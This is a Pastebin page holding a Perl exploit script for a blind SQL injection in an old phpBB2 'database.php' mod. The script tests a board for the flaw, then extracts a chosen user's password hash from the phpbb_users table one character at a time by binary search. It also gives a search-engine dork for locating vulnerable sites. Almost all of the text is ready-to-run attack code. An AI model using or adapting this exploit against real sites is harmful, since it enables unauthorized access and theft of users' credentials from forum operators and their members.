Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use strict;
- use warnings;
- use LWP::UserAgent;
- #
- # phpBB2 database.php mod Remote (blind) SQL-Injection
- # Note: its a very old mod, so i could not figure out the
- # name of the mod,even the phpbb.de-administrator could
- # not tell me the name of the mod, though they had the
- # script on their server!
- #
- # Dork: database.php?dir_id
- #
- my $url = shift;
- my $id = shift || usage();
- my $keyspace = "0123456789abcdef";
- # global vars... nasty eh ?
- our @url = ( "$url/database.php?dir_id=7+OR+ASCII(SUBSTR((SELECT+user_password+FROM+phpbb_users+WHERE+user_id=$id),1,1))", '', '' );
- our $regex = 'functions_database\.php';
- our $ua = LWP::UserAgent->new;
- $ua->agent('mozilla.. :D');
- print "[~] Checking...\n";
- my $r = $ua->get($url . "/database.php?dir_id='");
- die "\t[!!] Couldnt connect to $url!\n" unless ( $r->is_success );
- die "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /Allgemeiner\ Fehler/ );
- print "\t[*] Target seems to be vulnerable\n";
- print "[~] Unleashing Black Magic...\n";
- print STDERR "\t[*] Getting Hash: ";
- for ( 1..32 ) {
- $url[0] =~ s/\),[0-9]{1,2},/\),$_,/;
- blind( build_array($keyspace), 0, 16);
- }
- print "\n";
- sub usage {
- print q
- {-----------------------------------------
- - phpBB 'database.php mod' -
- - remote SQL-Injection -
- -----------------------------------------
- - written by electron1x -
- - bug discovered by j0hn.x3r -
- -----------------------------------------
- - Usage -
- - phpdb.pl <board> <user id> -
- - Sample -
- - phpdb.pl http://example.com/phbBB2/ 1 -
- -----------------------------------------
- - Dork -
- - inurl:database.php?dir_id -
- -----------------------------------------
- };
- exit(0);
- }
- sub blind
- {
- my ( $keyspace, $bottom, $top ) = @_;
- my $center = int ($bottom+$top)/2;
- print STDERR chr $$keyspace[$center];
- if ( request($$keyspace[$center], '=')) {
- return $center;
- } elsif ( $top-$bottom > 0) {
- print STDERR "\b";
- return blind($keyspace, $center+1, $top )
- unless ( request($$keyspace[$center], '<') );
- return blind($keyspace, $bottom, $center-1);
- } else {
- print STDERR "[!!] Something went wront, dunno what..\n";
- exit(1);
- }
- }
- sub build_array {
- my @sorted = sort {$a<=>$b} map {ord} $_[0] =~ /./g;
- return \@sorted;
- }
- sub request {
- my ( $key, $flag ) = @_;
- my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]);
- return ( $r->content =~ /$regex/ );
- }
- __END__
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement